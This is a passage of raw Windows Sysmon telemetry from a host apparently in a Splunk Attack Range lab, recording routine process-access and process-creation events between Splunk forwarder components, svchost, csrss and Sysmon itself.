AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000805724Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.372{0C1E0330-F260-60EB-2D79-00000000D001}20883688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805723Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.232{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F260-60EB-2D79-00000000D001}2088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805722Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805721Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805720Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805719Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805718Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805717Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805716Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805715Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805714Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.232{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805713Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.216{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F260-60EB-2D79-00000000D001}2088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805712Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.216{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F260-60EB-2D79-00000000D001}2088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805711Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.217{0C1E0330-F260-60EB-2D79-00000000D001}2088C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000805753Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.607{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F261-60EB-2F79-00000000D001}2064C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805752Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.607{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805751Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.607{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805750Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.607{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805749Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.607{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805748Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.607{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805747Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.607{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805746Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.607{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805745Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.607{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805744Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.607{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805743Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.591{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F261-60EB-2F79-00000000D001}2064C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805742Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:25.591{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F261-60EB-2F79-00000000D001}2064C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805741Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 